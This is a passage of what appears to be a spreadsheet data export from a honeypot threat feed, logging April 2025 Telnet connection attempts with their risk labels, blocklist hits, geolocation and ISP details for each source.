    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ce:5f3e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1937"/>
    <x v="1937"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T23:09:51"/>
    <d v="2025-04-13T23:09:51"/>
    <d v="2025-04-13T23:09:51"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="BY"/>
    <s v="Belarus"/>
    <s v="HM"/>
    <s v="Minsk City"/>
    <s v="NA"/>
    <s v="Minsk"/>
    <s v="625144"/>
    <s v="220002"/>
    <s v="53.9045"/>
    <s v="27.5615"/>
    <s v="6697"/>
    <s v="BELPAK-AS"/>
    <s v="Republican Unitary Telecommunication Enterprise Beltelecom"/>
    <s v="corporate"/>
    <s v="Magnezit Minsk"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5639:9c36"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1938"/>
    <x v="1938"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T23:02:47"/>
    <d v="2025-04-13T16:51:06"/>
    <d v="2025-04-13T23:02:47"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="MTNL Mumbai"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb4:b4b3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1939"/>
    <x v="1939"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T23:02:18"/>
    <d v="2025-04-13T23:02:18"/>
    <d v="2025-04-13T23:02:18"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:a4de"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1940"/>
    <x v="1940"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T22:54:20"/>
    <d v="2025-04-13T22:54:20"/>
    <d v="2025-04-13T22:54:20"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>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1:66ff"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1941"/>
    <x v="1941"/>
    <s v="host165-120-245-118.range165-120.btcentralplus.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-13T22:11:25"/>
    <d v="2025-02-15T21:48:33"/>
    <d v="2025-04-13T22:11:25"/>
    <n v="24"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Incomming Traffic&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Greater London"/>
    <s v="London"/>
    <s v="2643743"/>
    <s v="W1B"/>
    <s v="51.5072"/>
    <s v="-0.127586"/>
    <s v="2856"/>
    <s v="British Telecommunications PLC"/>
    <s v="BT Public Internet Service"/>
    <s v="business"/>
    <s v="INFONET Services Corporation"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a578:f576"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1942"/>
    <x v="1942"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T22:06:29"/>
    <d v="2025-04-09T14:27:01"/>
    <d v="2025-04-13T22:06:29"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="NA"/>
    <s v="37.3589"/>
    <s v="127.115"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Korea Telecom"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b10:99ef"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1943"/>
    <x v="1943"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T21:56:18"/>
    <d v="2025-04-13T14:48:49"/>
    <d v="2025-04-13T21:56:18"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="17813"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="MTNL Mumbai"/>
    <s v="2004-11-30"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb4:a980"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1944"/>
    <x v="1944"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T21:55:06"/>
    <d v="2025-04-13T11:56:37"/>
    <d v="2025-04-13T21:55:06"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c0:49e5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1945"/>
    <x v="1945"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T21:53:47"/>
    <d v="2025-01-03T07:40:34"/>
    <d v="2025-04-13T21:53:47"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H30"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="PA"/>
    <s v="Pennsylvania"/>
    <s v="Allegheny"/>
    <s v="Bethel Park"/>
    <s v="5180199"/>
    <s v="15102"/>
    <s v="40.3276"/>
    <s v="-80.0395"/>
    <s v="7922"/>
    <s v="Comcast Cable Communications, LLC"/>
    <s v="Comcast Cable Communications, LLC"/>
    <s v="residential"/>
    <s v="Comcast Cable Communications, LLC"/>
    <s v="2004-08-09"/>
    <s v="CBC-CM-3"/>
    <s v="2021-01-25"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:465a:d95e"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1946"/>
    <x v="1946"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T21:47:01"/>
    <d v="2025-04-13T21:47:01"/>
    <d v="2025-04-13T21:47:01"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Phasi Charoen"/>
    <s v="Phasi Charoen"/>
    <s v="1607782"/>
    <s v="10160"/>
    <s v="13.7147"/>
    <s v="100.437"/>
    <s v="23969"/>
    <s v="TOT-NET"/>
    <s v="TOT Public Company Limited"/>
    <s v="consumer"/>
    <s v="TOT Public Company Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:656c:4f08"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1947"/>
    <x v="1947"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T21:16:49"/>
    <d v="2025-04-13T21:16:49"/>
    <d v="2025-04-13T21:16:49"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75eb:9160"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1948"/>
    <x v="1948"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T20:56:57"/>
    <d v="2025-01-18T00:37:45"/>
    <d v="2025-04-13T20:56:57"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7838:b59"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1949"/>
    <x v="1949"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T20:42:19"/>
    <d v="2025-04-13T18:26:10"/>
    <d v="2025-04-13T20:42:19"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay-General"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d9:445a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1950"/>
    <x v="1950"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T20:39:32"/>
    <d v="2025-04-13T20:39:32"/>
    <d v="2025-04-13T20:39:32"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="PT"/>
    <s v="Portugal"/>
    <s v="11"/>
    <s v="Lisbon"/>
    <s v="Lisbon"/>
    <s v="Lisbon"/>
    <s v="2267057"/>
    <s v="NA"/>
    <s v="38.7223"/>
    <s v="-9.13934"/>
    <s v="12353"/>
    <s v="VODAFONE-PT"/>
    <s v="Vodafone Portugal - Communicacoes Pessoais S.A."/>
    <s v="corporate"/>
    <s v="Ptvdfcustedes220"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9445:5826"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1951"/>
    <x v="1951"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T20:33:44"/>
    <d v="2025-04-13T20:33:44"/>
    <d v="2025-04-13T20:33:44"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'korea.services.net': ['unknown']}"/>
    <n v="75"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="26"/>
    <s v="Busan"/>
    <s v="Dongnae-gu"/>
    <s v="Dongnae (Jeonpo-daero)"/>
    <s v="1834203"/>
    <s v="NA"/>
    <s v="35.1543"/>
    <s v="129.065"/>
    <s v="9845"/>
    <s v="CJCKN-AS-KR"/>
    <s v="LG HelloVision Corp."/>
    <s v="corporate"/>
    <s v="HVJungbusan"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2a52:f199"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1952"/>
    <x v="1952"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T20:22:13"/>
    <d v="2025-04-12T11:53:19"/>
    <d v="2025-04-13T20:22:13"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="NA"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VNPT"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:eec:19f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1953"/>
    <x v="1953"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T20:21:42"/>
    <d v="2025-04-13T20:21:42"/>
    <d v="2025-04-13T20:21:42"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5e:30c3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1954"/>
    <x v="1954"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T20:02:48"/>
    <d v="2025-04-13T20:02:48"/>
    <d v="2025-04-13T20:02:48"/>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4:904b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1955"/>
    <x v="1955"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T19:50:31"/>
    <d v="2025-04-13T19:50:31"/>
    <d v="2025-04-13T19:50:31"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
